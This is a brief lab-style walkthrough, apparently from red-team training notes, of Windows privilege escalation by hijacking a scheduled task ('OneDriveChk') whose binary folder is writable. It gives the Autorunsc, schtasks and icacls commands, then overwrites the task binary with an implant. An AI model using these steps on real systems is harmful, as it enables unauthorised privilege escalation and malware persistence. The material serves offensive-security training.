First: Let’s try to find missing tasks

Autorunsc64.exe -a t | more

Untitled

Second: Let’s get more information about that task

schtasks /query /tn OneDriveChk /xml

Untitled

Notice that that task is running as this user and with the Highest Privilege and also we got the path of that binary

Third: Let’s check if we can write to that path

icacls C:\RTO\bin\

Untitled

And yeah we have modified access

Fourth: Copy our malicious payload to that folder

copy C:\Users\IEUser\Desktop\LPE\implant\implant.exe C:\RTO\bin\OneDriveChk.exe

Untitled